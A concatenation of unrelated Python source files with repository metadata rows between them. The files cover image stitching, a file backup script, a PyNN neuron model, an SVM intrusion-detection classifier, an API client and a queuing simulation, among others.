[1, 2, 1, 3, 4, 4, 5, 6, 2, 1, 3, 1, 3, 2, 1, 2, 4, 1],
[1, 1, 1, 1, 1],
[100, 100]
]
for walls in test_cases:
print('Running on input:', walls)
print('Result:', max_water_trapped(walls))
print()
main()
| [
"rymarr@tuta.io"
] | rymarr@tuta.io |
d0e9ac32ea79140d1cf38d1451aa72f8f0ee96a7 | 9db35a0ffb82a5a1c41a098fc14524cd9c98a8c2 | /main.py | b38f6f46f58f5508518562e52d0b64dcf030851c | [
"MIT"
] | permissive | Sirius-Bell/backup_your_files | fd08b9e914e028b0ff06c0517d621e95a525b659 | ef8ed89489d18562d097dfdb5c51daa0f5c1474c | refs/heads/master | 2023-07-07T02:03:54.045580 | 2019-11-24T19:55:11 | 2019-11-24T19:55:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,011 | py | #Python 3.8.0
#Make by Lonely Dark
import argparse
import os
parser=argparse.ArgumentParser()
parser.add_argument('-r', '--recursive', help='recursive add files', action='store_true')
parser.add_argument('-d', '--directory', help='directory where the files(or file) are. If file one, input file with full name', required=True)
args=parser.parse_args()
if args.recursive:
os.chdir(args.directory)
files=os.listdir()
for e in files:
try:
file1=open(e,'rb')
file2=open('backup_'+e, 'wb')
file2.write(file1.read())
file1.close()
file2.close()
except PermissionError:
os.chdir(e)
files=os.listdir()
for e in files:
file1=open(e,'rb')
file2=open('backup_'+e, 'wb')
file2.write(file1.read())
file1.close()
file2.close()
os.chdir(args.directory)
continue
else:
file1=open(args.directory, 'rb')
file_name=args.directory.split('.')
file2=open(file_name[0]+'_backup'+'.'+file_name[1], 'wb')
file2.write(file1.read())
file1.close()
file2.close()
| [
"vlad10game@gmail.com"
] | vlad10game@gmail.com |
edb713de802c8b7fb038ec61f997ca5c7f5cc79c | 5911e6935bd21da01246cc4fe4db362921f703bc | /image_stitch/utilities.py | c06d225691eaa0a98fbc6089ffaa43fe2a159dcf | [] | no_license | siadajpan/profile_stitching | 5be005aab43d857eaf38e2d97ae51de05b0d38c8 | c2d511543c1ef640a53c8366edb3d3b84c3e27bb | refs/heads/master | 2020-03-31T08:53:36.556256 | 2019-02-19T16:05:19 | 2019-02-19T16:05:19 | 152,075,950 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,331 | py | import numpy as np
import cv2
def get_dark_cols(img):
(rows, cols, ch) = img.shape
for start_col in range(cols):
if img[:, start_col, :].mean() > 5:
break
for end_col in range(cols):
if img[:, -end_col, :].mean() > 5:
break
print 'start: %s, end: %s' %(start_col, end_col)
if end_col == 0:
end_col = cols + 1
else:
end_col = -end_col
return start_col, end_col
def preprocess_images(imageA, imageB, ratio):
# get rid of dark left and right
(start_col, end_col) = get_dark_cols(imageA)
imageA = imageA[:, start_col:end_col]
imageB = imageB[:, start_col:end_col]
# rotate the images
(rows,cols, channels) = imageA.shape
M = cv2.getRotationMatrix2D((cols/2,rows/2),-90,1)
imageA = cv2.warpAffine(imageA,M,(rows,cols))
imageB = cv2.warpAffine(imageB,M,(cols,rows))
#resize to speed up stitching
new_sizes = (int(cols * ratio), int(rows * ratio))
imageA_stitch = cv2.resize(imageA, new_sizes)
imageB_stitch = cv2.resize(imageB, new_sizes)
return (imageA, imageA_stitch, imageB, imageB_stitch)
def create_result_array(imageA, no_of_images, ratio):
(imageA, a, b, c) = preprocess_images(imageA, imageA, ratio)
result = np.zeros((imageA.shape[0], imageA.shape[1]*no_of_images, 3), dtype = 'uint8')
#print 'height: ', result.shape[0]
#print 'width: ', result.shape[1]
return result | [
"siadajpan@o2.pl"
] | siadajpan@o2.pl |
4db6157cc5bc0c7c11ea4235146bea8a5a87a274 | 435a524191c2611d7abb7390a8422e8f15a93065 | /PYTHON/Learn Python/Level_0/Challenges/Solutions/12) Lists 2.py | 556e862f46b381f20f15ba67c3f853f714716e77 | [] | no_license | huezune2000/Learn-Python-Offline | 565b52b092f043286ca886d6ae173ae4a61b3857 | d1c8be29cda2be34fd8e9bdc439c285c92f34a98 | refs/heads/master | 2021-05-27T01:59:18.405553 | 2014-03-08T03:52:57 | 2014-03-08T03:52:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 116 | py | ###
#12) Lists 2 Solution
###
l = []
for x in range (10):
n = x**3 + 2*x
l.append(n)
print (l)
| [
"itcaughtonj@gmail.com"
] | itcaughtonj@gmail.com |
8f240bfbf9e8882f118cf1a7b284cca910bf6864 | 644fdc72cb9f13a8101f0efcc9ab6ec5f3f8f250 | /project/yeet.py | 080c431e527c3e84b0758e976eab0aa1e01c9efd | [] | no_license | TruthorPear/Island-Escape | 52f720dc09cc19bde4f8101ab19504a34c9836a2 | c252c863f717f8aff81af7780c982a529331052c | refs/heads/master | 2020-03-24T01:21:09.171161 | 2018-07-26T14:06:27 | 2018-07-26T14:06:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,506 | py | import pyglet
from pyglet.window import key
import cocos
from cocos import actions, layer, sprite, scene
from cocos.director import director
# Player class
class Me(actions.Move):
# step() is called every frame.
# dt is the number of seconds elapsed since the last call.
def step(self, dt):
super(Me, self).step(dt) # Run step function on the parent class.
# Determine velocity based on keyboard inputs.
velocity_x = 1000 * (keyboard[key.RIGHT] - keyboard[key.LEFT])
velocity_y = 1000 * (keyboard[key.UP] - keyboard[key.DOWN])
# Set the object's velocity.
self.target.velocity = (velocity_x, velocity_y)
# Main class
def main():
global keyboard # Declare this as global so it can be accessed within class methods.
# Initialize the window.
director.init(width=500, height=300, autoscale=False, resizable=True)
# Create a layer and add a sprite to it.
player_layer = layer.Layer()
me = sprite.Sprite('eleph2.png')
player_layer.add(me)
# Set initial position and velocity.
me.position = (100, 100)
me.velocity = (0, 0)
# Set the sprite's movement class.
me.do(Me())
# Create a scene and set its initial layer.
main_scene = scene.Scene(player_layer)
# Attach a KeyStateHandler to the keyboard object.
keyboard = key.KeyStateHandler()
director.window.push_handlers(keyboard)
# Play the scene in the window.
director.run(main_scene)
if __name__ == '__main__':
main()
| [
"noreply@github.com"
] | noreply@github.com |
0b2bc07bfe47ebc246deec181f61d7fa55a65b8f | e8d5471bd4a47794d66162060343f740e0febca4 | /server/src/uds/auths/RegexLdap/__init__.py | 4065f8086cf40c30d7e64bfeaa397d4232fd9e6e | [] | no_license | git38438/openuds | ef939c2196d6877e00e92416609335d57dd1bd55 | 7d66d92f85f01ad1ffd549304672dd31008ecc12 | refs/heads/master | 2020-06-22T14:07:33.227703 | 2019-07-18T11:03:56 | 2019-07-18T11:03:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,687 | py | # -*- coding: utf-8 -*-
#
# Copyright (c) 2012 Virtual Cable S.L.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of Virtual Cable S.L. nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
@author: Adolfo Gómez, dkmaster at dkmon dot com
"""
from .Authenticator import RegexLdap
| [
"dkmaster@dkmon.com"
] | dkmaster@dkmon.com |
85276507b54d3f216c070a9c8873c8ff120d8120 | 72a8181e5502128fec62b132fbe19cd9d50dab4c | /rules/plot.smk | 28df3be0b7d220ab200f373be5f95348d4b02f2c | [] | no_license | EthanHolleman/DRIP-AGS-ENCODE | 1fd3b7065ec7f47e783674df14955a7b655edc08 | e3bb63b6d1cae82ddc6fe8857a1e66e2f41b2781 | refs/heads/main | 2023-04-03T21:07:34.651467 | 2021-04-23T02:42:18 | 2021-04-23T02:42:18 | 360,375,206 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 324 | smk |
rule make_feature_intersection_plot:
conda:
'../envs/R.yml'
input:
'output/intersect/all_samples_concat.intersection.bed'
output:
'output/plots/feature_intersection_plot.png'
shell:'''
mkdir -p output/plots
Rscript scripts/plot_encode_intersections.R {input} {output}
''' | [
"etholleman@ucdavis.edu"
] | etholleman@ucdavis.edu |
72934eff4f36840bbb0eaeaed8669ed059f2aca7 | 646212a664d3100af57ec1a6c0a4e450e51f991a | /particles/linktracks.py | e213831ba2ca6d9fedbc9b56ba54afd6a26507a6 | [
"MIT"
] | permissive | luispedro/particles | e06edf241471c3e075b0f3f0295bcf5b1506980c | 3bd05a85e7f78be933277b778ba124d396b19238 | refs/heads/master | 2021-01-20T21:26:07.742196 | 2009-05-30T20:51:45 | 2009-05-30T20:51:45 | 1,408,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,753 | py | This product includes software developed by Brian M. Clapper
(bmc@clapper.org, http://www.clapper.org/bmc/). That software is
copyright © 2008 Brian M. Clapper.
import numpy as np
import random
import math
from munkres import Munkres
'''
def generate_posits(tracks):
this function takes tracks and generates
(1) a video (3D array) of particles moving and (2) a list of list of particle positions
Both of these objects are useful for testing the LINK_TRACKS method below, where the position
lists are converted into a list of Tracks.
GENERATE_POSITS should be commented out when run as part of PARTICLES.
video = np.zeros((timesteps,L,L))
positions = []
# create video as 3D (t,x,y) array
for i in xrange(len(tracks)):
for j in xrange(len(tracks[i][1])):
video[tracks[i][0] + j][tracks[i][1][j].x][tracks[i][1][j].y]= 1
# print video # uncomment to show particle movement by frame
# create positions as list of lists(one poslist per timepoint)
posits = []
for t in xrange(np.size(video,0)):
pos = []
for i in xrange(np.size(video,1)):
for j in xrange(np.size(video,2)):
if video[t][i][j] == 1:
pos.append(Position(i,j))
posits.append(pos)
return (posits, video)
'''
def link_tracks(Positions):
'''
This function takes in a list of positions, per time frame, and constructs
particle tracks based on solutions to the 'assignment problem'. This is done
through the MUNKRES method by Brian Clapper, http://www.clapper.org/software/python/munkres/,
which must be installed for LINK_TRACKS to work.
The output format is identical to that from
TRACKGENERATION.py: a list of tuples, where the first element is the starting time of
the track, and the second element is a list of position objects, each having
attributes x and y.
'''
pos = Positions
TrackList = []
Tracks = []
t0 = 0
T = len(pos) # one list of positions per time frame
initNumOfTracks = len(pos[t0])
# initialize all first tracks
TrackList = []
for i in xrange(initNumOfTracks):
TrackList.append(EachParticle(t0,pos[t0][i])) #.give_the_track())
# move through positions by time
for i in xrange(T-1):
curr_posits = pos[i]
next_posits = pos[i+1]
cost = make_cost(curr_posits, next_posits)
m = Munkres()
indices = m.compute(cost)
# print indices
for row, column in indices:
for j in xrange(len(TrackList)):
if row >= len(curr_posits): # create new track
TrackList.append(EachParticle(i+1,next_posits[column]))
#print 'track created'
continue
if [lastElement(TrackList[j]).x, lastElement(TrackList[j]).y] == [curr_posits[row].x, curr_posits[row].y] and TrackList[j].active:
if column >= len(next_posits): # track deleted
TrackList[j].active = 0
else: # append new location to existing track
TrackList[j].poslist.append(next_posits[column])
# convert tracks from EachParticle to Particle format
Tracks = []
for i in xrange(len(TrackList)):
Tracks.append(TrackList[i].give_the_track())
return Tracks
def make_cost(curr, next):
'''
this method uses the 2-norm (DISTANCE) to calculate
the distance between particles
'''
cost = np.zeros( (max([len(curr), len(next)]), max([len(curr), len(next)])) )
if len(curr) <= len(next):
for c in xrange(len(curr)):
for n in xrange(len(next)):
cost[c][n] = distance(curr[c], next[n]) # padded with zeros when i < j
if len(curr) > len(next):
for c in xrange(len(curr)):
for n in xrange(len(next)):
cost[c][n] = distance(curr[c], next[n])
for c in curr:
for n in xrange(len(curr), len(next)):
cost[c][n] = max(cost[c]) # padded with max in each row
return cost
def distance(position_1, position_2):
pos1 = position_1
pos2 = position_2
dis = np.square(pos1.x - pos2.x) + np.square(pos1.y-pos2.y)
return np.sqrt(dis)
def lastElement(track):
return track.give_the_track()[1][-1]
# uncomment the following lines to run LINKTRACKS independently
'''
L = 5
timesteps = 5
testTracks = generate_tracks(1, L, 1, 3, 1, timesteps - 1)
(listOfPosLists, video) = generate_posits(testTracks)
tracks = link_tracks(listOfPosLists)
'''
| [
"ajs171@pitt.edu"
] | ajs171@pitt.edu |
1af643695b4192619ffcd424991f063d051f610c | 6cac02f4df495f1acec3fde64335aa4881230cba | /tutorials/foo-tutorial/foo/foo.py | c828d610c07b3232e3f034ebfbced761d19fd565 | [] | no_license | ivannz/pkg_deploy_repo_renamed | 96610728c097f0bb77a047b09681bb1d5fe6ffc3 | 9ce24ffcc5db6235dd3946f8a63123c3955ea957 | refs/heads/master | 2020-07-16T17:28:59.668633 | 2019-09-03T07:08:29 | 2019-09-03T07:08:29 | 205,832,544 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 193 | py | def this():
from this import s
d = {}
for c in (65, 97):
for i in range(26):
d[chr(i + c)] = chr((i + 13) % 26 + c)
return "".join(d.get(c, c) for c in s)
| [
"ivannz@yandex.ru"
] | ivannz@yandex.ru |
2a21ac1ec7913bc31720e0eb686e858987acfe58 | 75117becf9f75122e60cd806599ae24c16065689 | /python_models8/neuron/builds/IF_curr_exp_i.py | 307db7fb5aee6fefae5f3e8176e659b1466f3901 | [] | no_license | chanokin/sPyNNaker8NewModelTemplate | d911443fa650a4016828341fd252ddb2d7bad313 | 2d64f34ed5a8f5312a3176792bee57339785c5ea | refs/heads/master | 2020-11-27T01:10:50.593741 | 2020-01-07T15:56:54 | 2020-01-07T15:56:54 | 229,252,692 | 0 | 0 | null | 2019-12-20T11:28:48 | 2019-12-20T11:28:48 | null | UTF-8 | Python | false | false | 2,945 | py | # A PyNN Model for standard neurons built from components
from spynnaker.pyNN.models.neuron import AbstractPyNNNeuronModelStandard
# Components from main tools
from spynnaker.pyNN.models.neuron.input_types import InputTypeCurrent
from spynnaker.pyNN.models.neuron.synapse_types import SynapseTypeExponential
from spynnaker.pyNN.models.defaults import default_initial_values
from spynnaker.pyNN.models.neuron.neuron_models.neuron_model_leaky_integrate_and_fire import NeuronModelLeakyIntegrateAndFire
from python_models8.neuron.threshold_types.AdaptiveThreshold import AdaptiveThreshold
class IF_curr_exp_i(AbstractPyNNNeuronModelStandard):
@default_initial_values({"v_init", "isyn_exc", "isyn_inh"})
def __init__(self,
# neuron model parameters and state variables
i_offset=0.0,
v_init=-70.0,
v_rest=-70.0,
v_reset=-100.0,
tau_m=10.0,
cm=2.0,
tau_refrac=3.0,
# threshold type parameters
v_threshold=-10.0,
tau_threshold=120,
w_threshold=1.8,
# synapse type parameters
tau_syn_E=5.0,
tau_syn_I=5.0,
isyn_exc=0.0,
isyn_inh=0.0
):
if v_init is None:
v_init = v_rest
self.__v_init = v_init
self.__v_threshold = v_threshold
self.__tau_threshold = tau_threshold
self.__w_threshold = w_threshold
neuron_model = NeuronModelLeakyIntegrateAndFire(v_init, v_rest, tau_m, cm, i_offset, v_reset, tau_refrac)
synapse_type = SynapseTypeExponential(tau_syn_E, tau_syn_I, isyn_exc, isyn_inh)
input_type = InputTypeCurrent()
threshold_type = AdaptiveThreshold(v_threshold, w_threshold, tau_threshold, v_rest)
super(IF_curr_exp_i, self).__init__(
model_name="IF_curr_exp_i",
binary="IF_curr_exp_i.aplx",
neuron_model=neuron_model,
input_type=input_type,
synapse_type=synapse_type,
threshold_type=threshold_type
)
@property
def v_init(self):
return self.__v_init
@v_init.setter
def v_init(self, v_init):
self.__v_init = v_init
@property
def v_threshold(self):
return self.__v_threshold
@v_threshold.setter
def v_threshold(self, v_threshold):
self.__v_threshold = v_threshold
@property
def tau_threshold(self):
return self.__tau_threshold
@tau_threshold.setter
def tau_threshold(self, tau_threshold):
self.__tau_threshold = tau_threshold
@property
def w_threshold(self):
return self.__w_threshold
@w_threshold.setter
def w_threshold(self, w_threshold):
self.__w_threshold = w_threshold
| [
"chanokin@gmail.com"
] | chanokin@gmail.com |
16b2f102d13e260917ee44549fe5a1a09bc216a1 | c57414aa625d16e46f719cc1f89d347fc0500963 | /tools/test/sql_test.py | 900d3e5a8f7a125d86bfc47d29e03acde638a6ef | [] | no_license | W1nU/Coalert-Server | be3938c1ddedb83cdd0b4c5c173fee50a4b41b55 | 74834097f304d66963da21afc9377d55dfa9efe2 | refs/heads/master | 2020-03-30T05:08:21.326801 | 2018-10-13T17:35:50 | 2018-10-13T17:35:50 | 150,782,820 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 123 | py | import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from database import *
| [
"jsw9808@gmail.com"
] | jsw9808@gmail.com |
0f2ac223d96f5a6d71a7a54cad6006c3bc48733c | b6f8b2f023004fc0ea185b5e1ef2cbccce9ef513 | /misc/figures_thesis.py | 05bcf26cc2a72e5051b3bd7f7406d3d6a1d50359 | [
"BSD-3-Clause"
] | permissive | tenglongcong/petibm-examples | a73a6cdba864269fe9402d0a8b44582f2bcbcd9f | 3817d50b0b26df5901701c0cfe82a2d57c964e89 | refs/heads/master | 2020-11-27T17:12:28.335357 | 2019-12-04T23:51:54 | 2019-12-04T23:51:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 979 | py | """Gather figures (to be included in thesis)."""
import os
import pathlib
import shutil
rootdir = pathlib.Path(__file__).absolute().parents[1]
n_parts = len(rootdir.parts)
# Create the output directory.
figdir = rootdir / 'figures_thesis'
figdir.mkdir(parents=True, exist_ok=True)
# Load paths of figures to gather.
inpath = rootdir / 'misc' / 'figures_thesis.txt'
filepaths = []
with open(inpath, 'r') as infile:
filepaths = [rootdir / line.strip() for line in infile.readlines()
if not line.startswith('#')]
# Define new names of the output figures.
filenames = []
for filepath in filepaths:
filename, filedir = filepath.name, filepath.parent
prefix = '_'.join([e for e in filedir.parts[n_parts + 2:]
if e != 'figures'])
filenames.append('_'.join([prefix, filename]).lstrip('_'))
# Copy figures to output directory.
for filepath, filename in zip(filepaths, filenames):
shutil.copy(filepath, figdir / filename)
| [
"mesnardo@gwu.edu"
] | mesnardo@gwu.edu |
7ca45edf23818b3c74ce0cf938d26cfb845f23aa | 4b46a3266967acfd8e1d2f753d9803aa8d666d9f | /api/client.py | 630a6c9561b6821c9c3a8791508b8f74c7028694 | [] | no_license | dlbewley/WebDevTemplates | 601e48d7cdb8f7405bbb36da5660fcf8e349f0a8 | e3a685d22abd5a4ef828d91797b1d6c44b2bbdc1 | refs/heads/master | 2021-01-17T23:11:13.976923 | 2015-03-13T01:29:46 | 2015-03-13T01:29:46 | 31,397,821 | 1 | 0 | null | 2015-02-27T01:30:54 | 2015-02-27T01:30:54 | null | UTF-8 | Python | false | false | 2,274 | py | #!/usr/bin/env python
import pycurl
import cStringIO
import json
import random
# make sure to:
#
# pip install pycurl
#
# we are not including pycurl in the requirements.txt file because
# this script is an example of a standalone client that another user
# would use to access your api (just like the curl commands
# in the readme file, but in a full-blow python script instead).
# running this script will post an example tag, and will also get
# a list of all current tags. make sure you setup the app first tho.
###############################################################################
def generateRandomTag():
###############################################################################
word_file = "/usr/share/dict/words"
WORDS = open(word_file).read().splitlines()
return WORDS[ random.randint(0, len(WORDS)) ]
###############################################################################
def post():
###############################################################################
# initialize
api = 'http://localhost:5000/tags'
data = json.dumps({"name": generateRandomTag()})
# run
c = pycurl.Curl()
c.setopt(pycurl.URL, api)
c.setopt(pycurl.HTTPHEADER, ['Content-Type: application/json'])
c.setopt(pycurl.POST, 1)
c.setopt(pycurl.POSTFIELDS, data)
c.perform()
c.close()
###############################################################################
def get():
###############################################################################
# initialize
api = 'http://localhost:5000/tags'
buf = cStringIO.StringIO()
# run
c = pycurl.Curl()
c.setopt(c.URL, api)
c.setopt(c.WRITEFUNCTION, buf.write)
c.perform()
# display
data = json.loads(buf.getvalue())
buf.close()
print data
###############################################################################
def main():
###############################################################################
print '\n*** POST ***\n'
post()
print '\n*** GET ***\n'
get()
###############################################################################
if __name__ == '__main__':
main()
###############################################################################
| [
"sms@pixar.com"
] | sms@pixar.com |
a0dd99b7f5cfeb2e2a69bd6b6f42ec9a16cf0864 | e2694203560eb49e1a32e4b380d75d36d7fe39e1 | /svm_binary_pca.py | b4308fb9fe6f8542ab497e538bdebb65ab41d4a1 | [] | no_license | TPLink32/ML-based-Network-Intrusion-Detection-using-Cyber-Dataset-CSE-CIC-IDS2018-to-classify-network-attacks | 66c85b2f525f0374a1942f5eb07ecb7c9a4d2021 | 3e9b43c876978f29570569199dfdcd86528616c0 | refs/heads/master | 2023-02-07T19:36:22.249235 | 2020-12-26T16:08:14 | 2020-12-26T16:08:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,989 | py | import numpy as np
import pandas as pd
#from sklearn.kernel_approximation import RBFSampler
#from sklearn.linear_model import SGDClassifier
#from sklearn.model_selection import train_test_split
from sklearn import svm
from sklearn.metrics import classification_report
from sklearn import metrics
#from sklearn.linear_model import LogisticRegression
#from sklearn.naive_bayes import GaussianNB
#from sklearn.neighbors import KNeighborsClassifier
#from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import (precision_score, recall_score,f1_score, accuracy_score,mean_squared_error,mean_absolute_error)
#from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.preprocessing import Normalizer
#from sklearn.model_selection import GridSearchCV
from sklearn.svm import SVC
from sklearn.metrics import confusion_matrix
from sklearn.decomposition import PCA
#from sklearn.metrics import auc
traindata = pd.read_csv('preprocessed_train_4a_new.csv', header=None)
testdata = pd.read_csv('preprocessed_test_4a_new.csv', header=None)
X = traindata.iloc[0:,1:71]# 71 columns of data frame with all row
Y = traindata.iloc[0:,71]#
T = testdata.iloc[0:,1:71]
C = testdata.iloc[0:,71]
scaler = Normalizer().fit(X)
trainX = scaler.transform(X)
scaler = Normalizer().fit(T)
testT = scaler.transform(T)
#newcode pca train
pca=PCA(n_components=50)
pca.fit(trainX )
x_train_pca=pca.transform(trainX)
#newcode pca test
pca.fit(testT)
x_test_pca=pca.transform(testT)
traindata = np.array(x_train_pca)
trainlabel = np.array(Y)
testdata = np.array(x_test_pca)
testlabel = np.array(C)
#SVM
print("------------------------SVM Classifier--------------------")
#proba = model.predict_proba(testdata)
#np.savetxt('predictedlabelSVM-rbf.txt', predicted, fmt='%01d')
#np.savetxt('predictedprobaSVM-rbf.txt', proba)
'''
print("-------------------------Random Forest binary----------------------------")
#create the model with 100 trees
model = RandomForestClassifier(n_estimators=1000)
model = model.fit(traindata, trainlabel)
# make predictions
expected = testlabel
## Actual class predictions
predicted = model.predict(testdata)
pn.savetxt('predictedRF.txt', predicted, fmt='%01d')
# summarize the fit of the model
accuracy = accuracy_score(expected, predicted)
#recall = recall_score(expected, predicted, pos_label=1,average="binary")
#precision = precision_score(expected, predicted , pos_label=1,average="binary")
#f1 = f1_score(expected, predicted , pos_label=1,average="binary")
cm = metrics.confusion_matrix(expected, predicted)
tpr = float(cm[0][0])/pn.sum(cm[0])
fpr = float(cm[1][1])/pn.sum(cm[1])
#print("%.3f", tpr)
#print("%.3f", fpr)
print("Accuracy: ")
print("%.3f" %accuracy)
#print("Precision: ")
#print("%.3f" %precision)
#print("Recall: ")
#print("%.3f" %recall)
##print("f-score: ")
#print("%.3f" %f1)
print("FPR: ")
print("%.3f" %fpr)
print("TPR: ")
print("%.3f" %tpr)
print ("Confusion matrix: ")
print (metrics.confusion_matrix(expected, predicted))
# performance
print ("Classification report for %s", model)
print ("\n")
print (metrics.classification_report(expected, predicted))
'''
print("----------------------SVM linear binary---------------------------")
model = svm.SVC(kernel='linear', C=1000,probability=False)
model.fit(traindata, trainlabel)
print(model)
# make predictions
expected = testlabel
predicted = model.predict(testdata)
#proba = model.predict_proba(testdata)
#np.savetxt('G:/Pramita/FALL 2018_2ND_SEM/MS_Thesis/NIDS/Network-Intrusion-Detection-master/NSL-KDD/traditional/binary/predictedlabelSVM-linear.txt', predicted, fmt='%01d')
#np.savetxt('G:/Pramita/FALL 2018_2ND_SEM/MS_Thesis/NIDS/Network-Intrusion-Detection-master/NSL-KDD/traditional/binary/predictedprobaSVM-linear.txt', proba)
# summarize the fit of the model
accuracy = accuracy_score(expected, predicted)
#recall = recall_score(expected, predicted , pos_label=1,average="binary")
#precision = precision_score(expected, predicted ,pos_label=1, average="binary")
#f1 = f1_score(expected, predicted,pos_label=1, average="binary")
cm = metrics.confusion_matrix(expected, predicted)
tpr = float(cm[0][0])/np.sum(cm[0])
fpr = float(cm[1][1])/np.sum(cm[1])
print("Accuracy: ")
print("%.3f" %accuracy)
#print("Precision: ")
#print("%.3f" %precision)
#print("Recall: ")
#print("%.3f" %recall)
#print("f1-score: ")
#print("%.3f" %f1)
print("FPR: ")
print("%.3f" %fpr)
print("TPR: ")
print("%.3f" %tpr)
print ("Confusion matrix: ")
print (metrics.confusion_matrix(expected, predicted))
# performance
print ("Classification report for %s", model)
print ("\n")
print (metrics.classification_report(expected, predicted))
print("-----------------------SVMrbf Binary--------------------------------------")
model = svm.SVC(kernel='rbf', probability= False)
model = model.fit(traindata, trainlabel)
# make predictions
expected = testlabel
predicted = model.predict(testdata)
accuracy = accuracy_score(expected, predicted)
#recall = recall_score(expected, predicted, pos_label=1,average="binary")
#precision = precision_score(expected, predicted, pos_label=1,average="binary")
#f1 = f1_score(expected, predicted, pos_label=1,average="binary")
cm = metrics.confusion_matrix(expected, predicted)
#print(cm)
tpr = float(cm[0][0])/np.sum(cm[0])
fpr = float(cm[1][1])/np.sum(cm[1])
print("Accuracy: ")
print("%.3f" %accuracy)
#print("Precision: ")
#print("%.3f" %precision)
#print("Recall: ")
#print("%.3f" %recall)
#print("f1-score: ")
#print("%.3f" %f1)
print("FPR: ")
print("%.3f" %fpr)
print("TPR: ")
print("%.3f" %tpr)
print ("Confusion matrix: ")
print (metrics.confusion_matrix(expected, predicted))
# performance
print ("Classification report for %s", model)
print ("\n")
print (metrics.classification_report(expected, predicted))
| [
"noreply@github.com"
] | noreply@github.com |
9a89eb24723752edbc2a66b1541fe2fc2ce40807 | 071dcda0b97447701bfcd24be84917cc956f3d14 | /queuing theory .py | 46869c315062d3b6069acd7dad1472f9a4288e2d | [] | no_license | yukiiwong/Queuing-Model-with-Preemptive-Priorities | d71897cb44fee85393e72a78904022634826db1f | a75d7bc4f86162c78ab8785eadd366f4de7ea1ac | refs/heads/master | 2020-04-12T07:43:45.576606 | 2018-12-19T06:36:43 | 2018-12-19T06:36:43 | 162,368,571 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,122 | py | import numpy as np
from PIL import Image,ImageDraw,ImageFont
import cv2
import numpy
#initial input
lambda1 = 2*0.2/60
lambda2 = 1.3*0.6/60
lambda3 = 1.2/60
u = 3*1.1
simu_num = 60*24*10
#input procedure
x1 = np.random.poisson(lam = lambda1,size = simu_num)
x2 = np.random.poisson(lam = lambda2,size = simu_num)
x3 = np.random.poisson(lam = lambda3,size = simu_num)
sum_patient = x1.sum() + x2.sum() + x3.sum() #total numbel of patient
ux = np.random.poisson(lam = 3,size= (sum_patient,20))
ser_time = np.zeros(sum_patient,float)
for i in range(len(ux)):
ser_time[i] = round(60/ux[i].mean()) #generate each patient's sevice time unit:minute
#queuing model
time_axis = []
finish_people = 0
finish_time1 = 0
finish_time2 = 0
finish_time3 = 0
queuing_line = [0,0,0]#simulate the waiting queue:[0] is the first-class patient, then...
doctor = 0
#record the W_q
tcome1 = []
tcome2 = []
tcome3 = []
twait1 = []
twait2 = []
twait3 = []
def record_come_time(i, x1, x2, x3, tcome1, tcome2, tcome3):
if x1[i] > 0:
for j in range(x1[i]):
tcome1.append(i)
if x2[i] > 0:
for j in range(x2[i]):
tcome2.append(i)
if x3[i] > 0:
for j in range(x3[i]):
tcome3.append(i)
return(tcome1, tcome2, tcome3)
def average(tcome, twait):
wq = []
W_q = 0
for i in range(len(twait)):
wq.append(twait[i] - tcome[i])
W_q += wq[i]
W_q = W_q/(len(twait)+1)
return W_q/60
#facilitating agency
def service_rule(i,finish_time1, finish_time2, finish_time3, queuing_line, doctor, finish_people, ser_time, twait1, twait2, twait3):
if (i >= finish_time1) and (i >= finish_time2) and (i >= finish_time3):
doctor = 0
if doctor == 1:
pass
else:
if queuing_line[0] > 0:
doctor = 1
queuing_line[0] -= 1
finish_time1 = i + ser_time[finish_people]
finish_people += 1
twait1.append(i)
if (i < finish_time2):
twait2.pop()
queuing_line[1] += 1
finish_time2 = i
finish_people -= 1
if (i < finish_time3):
queuing_line[2] += 1
finish_time3 = i
finish_people -= 1
twait3.pop()
else:
if doctor == 2:
pass
else:
if queuing_line[1] > 0:
doctor = 2
queuing_line[1] -= 1
finish_time2 = i + ser_time[finish_people]
finish_people += 1
twait2.append(i)
if (i < finish_time3):
twait3.pop()
queuing_line[2] += 1
finish_time3 = i
finish_people -= 1
else:
if doctor == 3:
pass
else:
